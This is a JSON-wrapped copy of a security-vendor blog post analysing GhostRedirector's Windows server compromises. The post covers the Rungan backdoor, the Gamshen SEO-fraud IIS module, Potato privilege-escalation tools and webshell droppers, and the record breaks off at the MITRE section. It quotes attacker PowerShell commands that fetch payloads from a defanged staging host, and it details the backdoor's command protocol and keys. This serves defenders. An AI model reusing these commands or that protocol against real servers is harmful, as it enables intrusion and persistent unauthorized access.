{
	"id": "bc5013e2-af14-4de7-b634-f60d8970c107",
	"created_at": "2026-04-06T00:10:50.421897Z",
	"updated_at": "2026-04-10T13:12:21.611795Z",
	"deleted_at": null,
	"sha1_hash": "6890f97b76084593958ddc4b04bd15e6091e864e",
	"title": "GhostRedirector poisons Windows servers: Backdoors with a side of Potatoes",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 885446,
	"plain_text": "GhostRedirector poisons Windows servers: Backdoors with a side\r\nof Potatoes\r\nBy Fernando Tavella\r\nArchived: 2026-04-05 14:07:53 UTC\r\nESET researchers have identified a new threat actor, whom we have named GhostRedirector, that compromised at\r\nleast 65 Windows servers mainly in Brazil, Thailand, and Vietnam. GhostRedirector used two previously\r\nundocumented, custom tools: a passive C++ backdoor that we named Rungan, and a malicious Internet\r\nInformation Services (IIS) module that we named Gamshen.\r\nWhile Rungan has the capability of executing commands on a compromised server, the purpose of Gamshen is to\r\nprovide SEO fraud as-a-service, i.e., to manipulate search engine results, boosting the page ranking of a\r\nconfigured target website. Even though Gamshen only modifies the response when the request comes from\r\nGooglebot – i.e., it does not serve malicious content or otherwise affect regular visitors of the websites –\r\nparticipation in the SEO fraud scheme can hurt the compromised host website reputation by associating it with\r\nshady SEO techniques and the boosted websites.\r\nInterestingly, Gamshen is implemented as a native IIS module – IIS (Internet Information Services) is Microsoft’s\r\nWindows web server software, which has a modular architecture supporting two types of extensions: native (C++\r\nDLL) and managed (.NET assembly). There are different types of malware that can abuse this technology; our\r\n2021 white paper Anatomy of native IIS malware provides a deep insight into the types of native IIS threats and\r\ntheir architecture. Gamshen falls under the category of a trojan with the main goal of facilitating SEO fraud,\r\nsimilar to IISerpent, which we documented previously.\r\nBesides Rungan and Gamshen, GhostRedirector also uses a series of other custom tools, as well as the publicly\r\nknown exploits EfsPotato and BadPotato, to create a privileged user on the server that can be used to download\r\nand execute other malicious components with higher privileges, or used as a fallback in case the Rungan backdoor\r\nor other malicious tools are removed from the compromised server. We believe with medium confidence that a\r\nChina-aligned threat actor was behind these attacks. In this blogpost we provide insight into the GhostRedirector\r\narsenal used to compromise its victims.\r\nKey points of this blogpost:\r\nWe observed at least 65 Windows servers compromised in June 2025.\r\nVictims are mainly located in Brazil, Thailand, and Vietnam.\r\nVictims are not related to one specific sector but to a variety such as insurance, healthcare, retail,\r\ntransportation, technology, and education.\r\nGhostRedirector has developed a new C++ backdoor, Rungan, capable of executing commands\r\non the victim’s server.\r\nGhostRedirector has developed a malicious native IIS module, Gamshen, that can perform SEO\r\nfraud; we believe its purpose is to artificially promote various gambling websites.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 1 of 20\n\nGhostRedirector relies on public exploits such as BadPotato or EfsPotato for privilege escalation\r\non compromised servers.\r\nBased on various factors, we conclude with medium confidence that a previously unknown,\r\nChina-aligned threat actor was behind these attacks. We have named it GhostRedirector.\r\nAttribution\r\nWe haven’t been able to attribute this attack to any known group; thus we coined the new name GhostRedirector,\r\nto cluster all activities documented in this blogpost. These activities started in December of 2024, but we were\r\nable to discover other related samples that lead us believe that GhostRedirector has been active since at least\r\nAugust 2024.\r\nGhostRedirector has an arsenal that includes the passive C++ backdoor Rungan, the malicious IIS trojan\r\nGamshen, and a variety of other utilities. We have clustered these tools together by:\r\ntheir presence on the same compromised server within the same timeframe,\r\na shared staging server, and\r\nsimilarities in the PDB paths of various GhostRedirector tools, as explained below.\r\nWe believe with medium confidence that GhostRedirector is a China-aligned threat actor, based on the following\r\nfactors:\r\nmultiple samples of GhostRedirector tools have hardcoded Chinese strings,\r\na code-signing certificate issued to a Chinese company was used in the attack, and\r\none of the passwords for GhostRedirector-created users on the compromised server contains the word\r\nhuang, which is Chinese for yellow.\r\nGhostRedirector is not the first known case of a China-aligned threat actor engaging in SEO fraud via malicious\r\nIIS modules. Last year, Cisco Talos published a blogpost about a China-aligned threat actor called DragonRank\r\nthat conducts SEO fraud. There is some overlap in the victim geolocation (Thailand, India, and the Netherlands)\r\nand sectors (healthcare, transportation, and IT) in both attacks. However, it is likely that these were opportunistic\r\nattacks, exploiting as many vulnerable servers as possible, rather than targeting a specific set of entities. Besides\r\nthese similarities, we don’t have any reason to believe that DragonRank and GhostRedirector are linked, so we\r\ntrack these activities separately.\r\nVictimology\r\nFigure 1 shows a heatmap of the affected countries, combining data from two sources:\r\nESET telemetry, where we detected these attacks between December 2024 and April 2025, and\r\nour internet-wide scan from June 2025 that we ran to get a better understanding of the scale of the attack,\r\nand that allowed us to identify additional victims.\r\nWe notified all the victims that we identified through our internet scan about the compromise.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 2 of 20\n\nFigure 1. Countries where victims were detected\r\nWith all the collected information, we found that at least 65 Windows servers were compromised worldwide. Most\r\nof the affected servers are in Brazil, Peru, Thailand, Vietnam, and the USA. Note that most of the compromised\r\nservers located in the USA appear to have been rented to companies that are based in countries from the previous\r\nlist. We believe that GhostRedirector was more interested in targeting victims in South America and South Asia.\r\nAlso, we observed a small number of cases in:\r\nCanada,\r\nFinland,\r\nIndia,\r\nthe Netherlands,\r\nthe Philippines, and\r\nSingapore.\r\nGhostRedirector doesn’t seem to be interested in a particular vertical or sector; we have seen victims in sectors\r\nsuch as education, healthcare, insurance, transportation, technology, and retail.\r\nInitial access\r\nBased on ESET telemetry, we believe that GhostRedirector gains initial access to its victims by exploiting a\r\nvulnerability, probably an SQL Injection. Then it uses PowerShell to download various malicious tools – all from\r\nthe same staging server, 868id[.]com. In some cases, we have seen the attackers leveraging a different LOLBin,\r\nCertUtil, for the same purpose.\r\nThis conjecture is supported by our observation that most unauthorized PowerShell executions originated from the\r\nbinary sqlserver.exe, which holds a stored procedure xp_cmdshell that can be used to execute commands on a\r\nmachine.\r\nThe following are examples of commands that we detected being executed on the compromised servers:\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 3 of 20\n\ncmd.exe /d /s /c \" powershell curl  https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile\r\nC:\\ProgramData\\EfsNetAutoUser_br.exe\"\r\ncmd.exe /d /s /c \" powershell curl  http://xz.868id[.]com/EfsPotato_sign.exe -OutFile\r\nC:\\ProgramData\\EfsPotato_sign.exe\"\r\ncmd.exe /d /s /c \"powershell curl  https://xzs.868id[.]com/link.exe  -OutFile C:\\ProgramData\\link.exe\"\r\npowershell  curl  https://xzs.868id[.]com/iis/br/ManagedEngine64_v2.dll -OutFile \r\nC:\\ProgramData\\Microsoft\\DRM\\log\\ManagedEngine64.dll\r\npowershell  curl https://xzs.868id[.]com/iis/IISAgentDLL.dll -OutFile \r\nC:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll\r\nWe also encountered that GhostRedirector installed GoToHTTP on the compromised web server, after\r\ndownloading it from the same staging server. GoToHTTP is a benign tool that allows establishing a remote\r\nconnection that can be accessed from a browser.\r\nGhostRedirector used the directory C:\\ProgramData\\ to install its malware, particularly for the C++ backdoor and\r\nthe IIS trojan they use the directory C:\\ProgramData\\Microsoft\\DRM\\log.\r\nAttack overview\r\nAn overview of the attack is shown in Figure 2. Attackers compromise a Windows server, download and execute\r\nvarious malicious tools: a privilege escalation tool, malware that drops multiple webshells, the passive C++\r\nbackdoor Rungan, or the IIS trojan Gamshen. The purpose of the privilege escalation tools is to create a privileged\r\nuser in the Administrators group, so GhostRedirector can then leverage this account to execute privileged\r\noperations, or as a fallback in case the group loses access to the compromised server.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 4 of 20\n\nFigure 2. Attack overview\r\nPernicious Potatoes performing privilege escalation\r\nAs part of its arsenal, GhostRedirector created several tools that leverage the local privilege escalation (LPE)\r\ntactic, likely based on public EfsPotato and BadPotato exploits. Almost all of the analyzed samples were\r\nobfuscated with .NET Reactor, with multiple layers of obfuscation. Some of the samples were validly signed with\r\na code-signing certificate issued by TrustAsia RSA Code Signing CA G3, to 深圳市迪元素科技有限公司\r\n(Shenzhen Diyuan Technology Co., Ltd.), and with a thumbprint of\r\nBE2AC4A5156DBD9FFA7A9F053F8FA4AF5885BE3C.\r\nThe main goal of these samples was to create or modify a user account on the compromised server and add it to\r\nthe Administrators group.\r\nDuring our analysis, we extracted from the analyzed samples the following usernames that were used in the\r\ncreation of these malicious administrator users.\r\nMysqlServiceEx\r\nMysqlServiceEx2\r\nAdmin\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 5 of 20\n\nFigure 3 shows the decompiled code used by these samples to create a user after successful LPE exploitation. The\r\npassword has been redacted for security purposes.\r\nFigure 3. Portion of decompiled code that creates a new user on a victim server\r\nAs seen in Figure 3, these privilege escalation tools use a custom C# class named CUserHelper. This class is\r\nimplemented in a DLL named Common.Global.DLL (SHA-1:\r\n049C343A9DAAF3A93756562ED73375082192F5A8), which we named Comdai and that was embedded in the\r\nanalyzed samples. We believe that Comdai was created by the same developers as the rest of the GhostRedirector\r\narsenal, based on the shared pattern in their respective PDB paths – see the repeated x5 substring as shown in\r\nTable 1, which is shared between Rungan, Gamshen, and the privilege escalation tools.\r\nTable 1. PDB strings collected from GhostRedirector tools\r\nSample SHA1 Sample type PDBs\r\n049C343A9DAAF3A93756\r\n562ED73375082192F5A8\r\nComdai\r\nlibrary\r\nF:\\x5\\netTools\\oMain\\Common.Global\r\n\\obj\\Release\\Common.Global.pdb\r\n28140A5A29EBA098BC62\r\n15DDAC8E56EACBB29B69\r\nRungan, C++\r\nbackdoor\r\nF:\\x5\\AvoidRandomKill-main\r\n\\x64\\Release\\IISAgentDLL.pdb\r\n871A4DF66A8BAC3E640B\r\n2D1C0AFC075BB3761954\r\nGamshen, IIS\r\ntrojan\r\nF:\\x5\\AvoidRandomKill-main\r\n\\Release\\ManagedEngine64.pdb\r\n371818BDC20669DF3CA4\r\n4BE758200872D583A3B8\r\nTool to create\r\na new user\r\nE:\\x5\\netTools\\WinSystem\\obj\r\n\\Release\\uedit32_sign.pdb\r\nTable 2 provides an overview of the important classes implemented in Comdai that are used by GhostRedirector’s\r\nvarious privilege escalation tools, along with the description of the class behavior. Note the ExeHelper class,\r\nwhich provides a function to execute a file named link.exe – GhostRedirector used the same filename to deploy\r\nthe GoToHTTP tool.\r\nAlso note the backdoor-like capabilities, including network communication, file execution, directory listing, and\r\nmanipulating services and Windows registry keys. While we haven’t observed these methods being used by any\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 6 of 20\n\nknown GhostRedirector components, this shows that Comdai is a versatile tool that can support various stages of\r\nthe attack.\r\nTable 2. Classes implemented in Comdai\r\nC# class Description\r\nAES\r\nEncrypts/Decrypts AES in ECB mode.\r\nKey: 030201090405060708091011121315\r\nCUserHelper\r\nLists users on a compromised server.\r\nCreates a user with specified credentials and adds it into a group name also specified by an\r\nargument; by default it uses the Administrators group.\r\nExeHelper\r\nUsed to execute a binary named link.exe. This name was used by the attackers for the\r\nGoToHTTP binary.\r\nHttpHelper\r\nCan perform through different methods, GET and POST requests, with an unknown\r\npurpose, to a hardcoded URL – https://www.cs01[.]shop.\r\nMsgData Contains only attributes, used by the class NodejsTX to deserialize a JSON object.\r\nMyDll Invokes methods from an unknown DLL named MyDLL.dll.\r\nNodejsTX\r\nProvides a method to communicate with another malicious component via pipes; the pipe is\r\nnamed salamander_pipe, which can receive parameters to create a specified user who is\r\nthen added to the administrators group. This user creation is achieved by invoking a\r\nmethod from the CUserHelper class.\r\nRegeditHelper Contains a method for reading the value of a specified windows registry key.\r\nScanfDirectory Contains methods for listing the contents of a specified directory.\r\nServiceHelper Contains methods to restart a specified service.\r\nSystemHelper\r\nContains methods to execute a binary or execute commands via ProcessStartInfo class. The\r\nbinary or commands are provided to ProcessStartInfo as arguments.\r\nUserStruct\r\nContains only attributes, username – string\r\nGroups – list\u003cstring\u003e\r\nAttributes are used by class CUserHelper for listing users.\r\nSome exceptions to the rule\r\nWe discovered a sample (SHA-1: 21E877AB2430B72E3DB12881D878F78E0989BB7F) using the same\r\ncertificate, uploaded to VirusTotal in August 2024, which we believe is related to GhostRedirector’s arsenal,\r\nalthough we didn’t see it used during this campaign. This assumption is based on the behavior of the sample,\r\nwhich tries to open a text file and send its contents to a hardcoded URL. For this, the sample contains an\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 7 of 20\n\nembedded Comdai DLL and it invokes the Comdai C# class HttpHelper, which has a hardcoded URL that is\r\nhttps://www.cs01[.]shop – the same domain mentioned in Table 2.\r\nWe also discovered some privilege escalation tools that differ a little from the behavior mentioned previously.\r\nFor example, in one case (SHA-1: 5A01981D3F31AF47614E51E6C216BED70D921D60), instead of creating a\r\nnew user, it changes the password of an existing user Guest for one hardcoded in the malware and then, using the\r\nRID hijacking technique, it attempts to add this user to the administrator groups.\r\nIn another case (SHA-1: 9DD282184DDFA796204C1D90A46CAA117F46C8E1), the tool not only creates a new\r\nadministrator user but also installs multiple webshells on a specific path in the victim’s servers, provided manually\r\nby GhostRedirector as an argument to the tool.\r\nThese webshells are embedded in the resources of the sample in cleartext, and the names are hardcoded; the\r\nnames we saw used are:\r\nC1.php\r\nCmd.aspx\r\nError.aspx\r\nK32.asxp\r\nK64.aspx\r\nLandGrey.asp\r\nZunput, a website information collector plus webshell dropper\r\nAnother interesting tool used by GhostRedirector had the filename SitePuts.exe. This sample (SHA‑1:\r\nEE22BA5453ED577F8664CA390EB311D067E47786), which we named Zunput, is also developed with the\r\n.NET Framework and signed with the certificate mentioned above; it reads the IIS configuration system looking\r\nfor configured websites and obtains the following information about them:\r\nphysical path on the server,\r\nname, and\r\nfor each site, the following attributes:\r\n○ protocol\r\n○ IP address, and\r\n○ hostname\r\nOnce the information is collected, Zunput checks for the existence of the physical path on the server, and also\r\nverifies that the directory contains at least one file with the .php, .aspx, or .asp extension. This way, Zunput only\r\ntargets active websites capable of executing dynamic content – only in those directories does it then drop the\r\nembedded webshells. Webshells are embedded in the resources of the sample and for the dates of each webshell\r\n(creation, modified, accessed), the malware uses the date of an existing file from the directory.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 8 of 20\n\nWebshells are written in ASP, PHP, and JavaScript, and the names used are selected randomly from the following\r\nlist:\r\nXml\r\nAjax\r\nSync\r\nLoadapi\r\nLoadhelp\r\nCode\r\nJsload\r\nLoadcss\r\nLoadjs\r\nPop3\r\nImap\r\nApi\r\nExtensions used for the webshells:\r\n.cer\r\n.pjp\r\n.asp\r\n.aspx\r\nInformation collected during Zunput execution is saved in a file named log.txt (see an example in Figure 4) in the\r\ndirectory from which it was executed. This information isn’t exfiltrated automatically by Zunput, but it can be\r\nobtained by the attackers through several methods; one can be via the deployed webshell mentioned before.\r\nFigure 4. Example of saved content of log.txt where 分割线 machine translates to Dividing line\r\nThe final payloads\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 9 of 20\n\nRungan, a passive C++ backdoor\r\nRungan (SHA-1: 28140A5A29EBA098BC6215DDAC8E56EACBB29B69) is a passive C/C++ backdoor that we\r\nhave seen installed in C:\\ProgramData\\Microsoft\\DRM\\log\\miniscreen.dll.\r\nThis backdoor uses AES in CBC mode for string decryption. 030201090405060708090A0B0C0D0E0F is used for\r\nthe IV and key, and based on the malware’s PDB path F:\\x5\\AvoidRandomKill-main\\x64\\Release\\IISAgentDLL.pdb, we believe that GhostRedirector reuses the AES implementation from the\r\nAvoidRandomKill repository.\r\nThe main functionality of this backdoor is to register a plaintext hardcoded URL http://+:80/v1.0/8888/sys.html\r\ninto the compromised server, bypassing IIS by abusing the HTTP Server API. Then the backdoor waits for a\r\nrequest that matches that URL, then parses and executes the received commands on the compromised server.\r\nAdditional URLs can be set in an optional configuration file named\r\nC:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\vbskui.dll. Rungan will listen to all incoming\r\nrequests matching the configured patterns, and the configuration can be updated via a backdoor command. To\r\nactivate the backdoor, any incoming HTTP request must contain a specific combination of parameters and values,\r\nwhich are hardcoded in Rungan.\r\nOnce this check is met, Rungan uses the parameter action to determine the backdoor command, and uses the data\r\nin the HTTP request body as the command parameters. No encryption or encoding is used in the C\u0026C protocol.\r\nThe most notable capabilities are creating a new user or executing commands on the victim’s server; a full list of\r\nbackdoor commands is shown in Table 3.\r\nTable 3.Rungan backdoors commands\r\nParameter Body Description Response\r\nmkuser\r\nuser=\u003cUSERNAME\u003e\u0026pwd=\r\n\u003cPASSWORD\u003e\u0026groupname=\r\n\u003cGROUPNAME\u003e\r\nCreates the specified user on\r\nthe compromised server using\r\nthe NetUserAdd Windows\r\nAPI.\r\nStatus code of the\r\noperation.\r\nlistfolder path=\u003cA_PATH\u003e\r\nThis looks unfinished: it\r\ncollects information from\r\nselected path but doesn’t\r\nexfiltrate it.\r\nN/A\r\naddurl url=\u003cURL_1\u003e|\u003cURL_2\u003e\r\nRegisters URLs the backdoor\r\nwill listen on. Can be more\r\nthan one separated with |. The\r\nURL is also added to the\r\nconfiguration file.\r\nIf a URL fails to\r\nregister, the\r\nresponse will be\r\nFailed: \u003cURL\u003e,\r\notherwise All Ok.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 10 of 20\n\nParameter Body Description Response\r\ncmd\r\ncmdpath=\u003cCMD_PATH\u003e\u0026mingl=\r\n\u003cCOMMAND_TO_EXECUTE\u003e\r\nExecutes a command on the\r\nvictim’s server using pipes\r\nand the CreatePorcessA API.\r\nCommand output.\r\nFigure 5 and Figure 6 show different examples of requests made to the malware during a dynamic analysis using\r\nthe tool postman in a simulated environment.\r\nFigure 5. Executing commands on a testing server\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 11 of 20\n\nFigure 6. Adding a user through the malware on a testing server\r\nGamshen, malicious IIS module\r\nDeveloped as a C/C++ DLL, Gamshen is a malicious native IIS module. The main functionality of this malware is\r\nto intercept requests made to the compromised server from the Googlebot search engine crawler and only in that\r\ncase modify the legitimate response of the server. The response is modified based on data requested dynamically\r\nfrom Gamshen’s C\u0026C server. By doing this, GhostRedirector attempts to manipulate the Google search ranking of\r\na specific, third-party website, by using manipulative, shady SEO techniques such as creating artificial backlinks\r\nfrom the legitimate, compromised website to the target website. We previously documented a case of an IIS trojan\r\nusing similar tactics: see IISerpent: Malware-driven SEO fraud as a service.\r\nIt's important to mention that a regular user who visits the affected website wouldn’t see any changes and would\r\nnot be affected by the malicious behavior because Gamshen doesn’t trigger any of its malicious activity on\r\nrequests from regular visitors.\r\nFigure 7 shows how a malicious module participating in the IIS SEO fraud scheme modifies the legitimate\r\nresponse of a compromised server when a request is made from the Google Crawler, aka Googlebot.\r\nFigure 7. Overview of an SEO fraud scheme\r\nIn order to do this, the attackers have implemented their own malicious code for the following IIS event handlers:\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 12 of 20\n\nOnBeginRequest\r\nOnPreExecuteRequestHandler\r\nOnPostExecuteRequestHandler\r\nOnSendResponse\r\nWhen the compromised server receives an HTTP request, the request goes through the IIS request processing\r\npipeline, which triggers these handlers in various steps of the process – notably, the OnSendResponse handler is\r\ntriggered just before the HTTP response is sent out by the compromised server. Since Gamshen is installed as an\r\nIIS module, it automatically intercepts each incoming HTTP request at these steps, and performs three actions.\r\nFirst, it performs a series of validations to filter only HTTP requests of interest:\r\nThe request must originate from a Google crawler: either the User-Agent header contains the string\r\nGooglebot, or the Referer contains the string google.com.\r\nThe HTTP method must not be POST.\r\nThe requested resource is not an image, stylesheet, or similar static resource, i.e., it doesn’t have any of the\r\nfollowing extensions: .jpg, .resx, .png, .jpeg, .bmp, .gif, .ico, .css, or .js. This is likely to avoid breaking UI\r\nfunctionality.\r\nThe URL must contain the string android_ or match any of the following regular expressions:\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]{6,20})(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\\\\/([a-zA-Z0-9_]{6,20})\r\n(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\/([0-9_]{6,20})(/|\\\\.\\\\w+)?\r\n○ [/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\/([a-zA-Z]{8,10})(/|\\\\.\\\\w+)?\r\n○ [/]?([a-zA-Z0-9]{6,8})\\\\/([a-zA-Z0-9]{6,8})(/|\\\\.phtml|\\\\.xhtml|\\\\.phtm|\\\\.shtml)\r\n○ [/]?([a-zA-Z0-9_]{14})(/|\\\\.html|\\\\.htm)\r\n○ [/]?([a-zA-Z0-9]{6})\\\\/([a-zA-Z0-9]{8})(/|\\\\.html|\\\\.htm)\r\n○ [/]?([a-z0-9]{6})\\\\.xhtml\r\nSecond, Gamshen modifies the response intended for the search engine crawler with data obtained from its own\r\nC\u0026C server, brproxy.868id[.]com. We have observed three URLs being used for this purpose:\r\nhttps://brproxy.868id[.]com/index_base64.php?\u003cORIGINAL_URL\u003e\r\nhttps://brproxy.868id[.]com/tz_base64.php?\u003cORIGINAL_URL\u003e\r\nhttps://brproxy.868id[.]com/url/index_base64.php\r\nIn all cases, the following hardcoded User-Agent string is used: Mozilla/5.0 (compatible; Googlebot/2.1;\r\n+http://www.google.com/bot.html). A base64-encoded response is expected, which is then decoded and injected\r\ninto the HTTP response intended for the search engine crawler.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 13 of 20\n\nFinally, at the last step of the request processing pipeline, just before the HTTP response is sent out – the\r\nOnSendResponse event handler verifies the response for these crawler requests. If the response has the 404 HTTP\r\nstatus code – i.e., Gamshen had not been able to obtain the malicious data from its C\u0026C server, then it instead\r\nperforms a redirect to a different C\u0026C server: http://gobr.868id[.]com/tz.php.\r\nWe weren’t able to obtain a response from brproxy.868id[.]com or gobr.868id[.]com, but believe the data supports\r\nshady SEO techniques – such as keyword stuffing, inserting malicious backlinks – or, in case of the redirection,\r\nmaking the search engine associate the compromised website with the target, third-party website, thus poisoning\r\nthe search index.\r\nWe were, however, able to pivot on those domains on VirusTotal and find related images – in this case, images\r\nadvertising a gambling application for Portuguese speaking users. We believe this website is the beneficiary of the\r\nSEO fraud scheme, facilitated by this malicious IIS module – Gamshen probably attempts to compromise as many\r\nwebsites as possible and misuse their reputation to drive traffic to this third-party website.\r\nFigure 8 and Figure 9 show two images potentially used by GhostRedirector in its SEO fraud scheme.\r\nFigure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation:\r\nBenefits and privileges for VIP members)\r\nFigure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation:\r\nLarge deposits and withdrawals without worries)\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 14 of 20\n\nConclusion\r\nIn this blogpost, we have presented a previously unknown, China-aligned threat actor, GhostRedirector, and its\r\ntoolkit for compromising and abusing Windows servers. In addition to enabling remote command execution on the\r\ncompromised servers, GhostRedirector also deploys a malicious IIS module, Gamshen, designed to manipulate\r\nGoogle search results through shady SEO tactics. Gamshen abuses the credibility of the websites hosted on the\r\ncompromised server to promote a third-party, gambling website – potentially a paying client participating in an\r\nSEO fraud as-a-service scheme.\r\nGhostRedirector also demonstrates persistence and operational resilience by deploying multiple remote access\r\ntools on the compromised server, on top of creating rogue user accounts, all to maintain long-term access to the\r\ncompromised infrastructure.\r\nMitigation recommendations can be found in our comprehensive white paper. For any inquiries, or to\r\nmake sample submissions related to the subject, contact us at threatintel@eset.com.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\nEE22BA5453ED577F8664\r\nCA390EB311D067E47786\r\nSitePut.exe MSIL/Agent.FEZ\r\nZunput,\r\ninformation\r\ncollector and\r\nwebshell installer.\r\n677B3F9D780BE184528D\r\nE5967936693584D9769A\r\nEfsNetAutoUser.exe\r\nMSIL/HackTool.Agent\r\n.QJ\r\nA custom tool\r\nusing the EfsPotato\r\nexploit to create a\r\nnew user on the\r\ncompromised\r\nserver.\r\n5D4D7C96A9E302053BDF\r\nAF2449F9A2AB3C806E63\r\nNetAutoUser.exe MSIL/AddUser.S\r\nA custom tool\r\nusing the\r\nBadPotato exploit\r\nto create a new\r\nuser on the\r\ncompromised\r\nserver.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 15 of 20\n\nSHA-1 Filename Detection Description\r\n28140A5A29EBA098BC62\r\n15DDAC8E56EACBB29B69\r\nminiscreen.dll Win64/Agent.ELA\r\nRungan, a passive\r\nC++ backdoor.\r\n371818BDC20669DF3CA4\r\n4BE758200872D583A3B8\r\nauto.exe Generik.KJWBIPC\r\nA tool to create a\r\nnew user on the\r\ncompromised\r\nserver.\r\n9DD282184DDFA796204C\r\n1D90A46CAA117F46C8E1\r\nauto_sign.exe MSIL/Agent.XQL\r\nA tool to create a\r\nnew user or deploy\r\nwebshells on the\r\ncompromised\r\nserver.\r\n87F354EAA1A6ED5AE51C\r\n4B1A1A801B6CF818DAFC\r\nEfsNetAutoUser.exe\r\nMSIL/HackTool.Agent\r\n.QJ\r\nA custom tool\r\nusing the EfsPotato\r\nexploit to create a\r\nnew user on the\r\ncompromised\r\nserver.\r\n5A01981D3F31AF47614E\r\n51E6C216BED70D921D60\r\nDotNet4.5.exe MSIL/AddUser.S\r\nCustom tool using\r\nBadPotato exploit\r\nto elevate\r\nprivileges of an\r\nexisting user.\r\n6EBD7498FC3B744CED37\r\n1C379BA537077DD97036\r\nNetAUtoUser_sign\r\n.exe\r\nMSIL/AddUser.S\r\nCustom tool using\r\nBadPotato exploit\r\nto elevated\r\nprivileges of an\r\nexisting user.\r\n0EE926E29874324E52DE\r\n816B74B12069529BB556\r\nlink.exe\r\nWin64/RemoteAdmin.\r\nGotoHTTP. A potentially\r\nunsafe application\r\nGoToHTTP tool.\r\n373BD3CED51E19E88876\r\nB80225ECA65A5C01413F\r\nN/A PHP/Webshell.NWE Webshell.\r\n5CFFC4B3B96256A45FB4\r\n5056AE0A9DC76329C25A\r\nN/A ASP/Webshell.MP Webshell.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 16 of 20\n\nSHA-1 Filename Detection Description\r\nB017CEE02D74C92B2C65\r\n517101DC72AFA7D18F16\r\nN/A PHP/Webshell.OHB Webshell.\r\nA8EE056799BFEB709C08\r\nD0E41D9511CED5B1F19D\r\nN/A ASP/Webshell.UV Webshell.\r\nC4681F768622BD613CBF\r\n46B218CDA06F87559825\r\nN/A ASP/Webshell.KU Webshell.\r\nE69E4E5822A81F68107B\r\n933B7653C487D055C51B\r\nN/A ASP/Webshell.UZ Webshell.\r\nA3A55E4C1373E8287E4E\r\n4D5D3350AC665E1411A7\r\nN/A ASP/Webshell.UY Webshell.\r\nE6E4634CE5AFDA0688E7\r\n3A2C21A2ECDABD5E155D\r\nN/A ASP/Webshell.UY Webshell.\r\n5DFC2D0858DD7E811CD1\r\n9938B8C28468BE494CB6\r\nN/A ASP/Webshell.UX Webshell.\r\n08AB5CC8618FA593D2DF\r\n91900067DB464DC72B3E\r\nManagedEngine32\r\n_v2.dll\r\nWin32/BadIIS.AG\r\nGamshen, a\r\nmalicious IIS\r\nmodule.\r\n871A4DF66A8BAC3E640B\r\n2D1C0AFC075BB3761954\r\nManagedEngine64\r\n_v2.dll\r\nWin64/BadIIS.CY\r\nGamshen, a\r\nmalicious IIS\r\nmodule.\r\n049C343A9DAAF3A93756\r\n562ED73375082192F5A8\r\nN/A MSIL/Agent.FFZ\r\nComdai, a\r\nmalicious\r\nmultipurpose DLL\r\nused to create a\r\nmalicious user.\r\nNetwork\r\nIP Domain\r\nHosting\r\nprovider\r\nFirst seen Details\r\nN/A xzs.868id[.]com N/A 2024‑12‑03\r\nGhostRedirector staging\r\nserver, hosted on\r\nCloudflare.\r\nhttps://www.welivesecurity.com/en/eset-research/ghostredirector-poisons-windows-servers-backdoors-side-potatoes/\r\nPage 17 of 20\n\nIP Domain\r\nHosting\r\nprovider\r\nFirst seen Details\r\n104.233.192[.]1 xz.868id[.]com PEG TECH INC 2024‑12‑03\r\nGhostRedirector staging\r\nserver.\r\n104.233.210[.]229\r\nq.822th[.]com\r\nwww.881vn[.]com\r\nPEG TECH INC 2023‑10‑06\r\nGhostRedirector staging\r\nserver.\r\nN/A gobr.868id[.]com N/A 2024‑08‑25\r\nGamshen C\u0026C server,\r\nhosted on Cloudflare.\r\nN/A brproxy.868id[.]com N/A 2024‑08‑25\r\nGamshen C\u0026C server,\r\nhosted on Cloudflare.\r\n43.228.126[.]4 www.cs01[.]shop\r\nXIMBO Internet\r\nLimited\r\n2024‑04‑01 Comdai C\u0026C server.\r\n103.251.112[.]11 N/A IRT‑HK‑ANS N/A\r\nGhostRedirector staging\r\nserver.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE 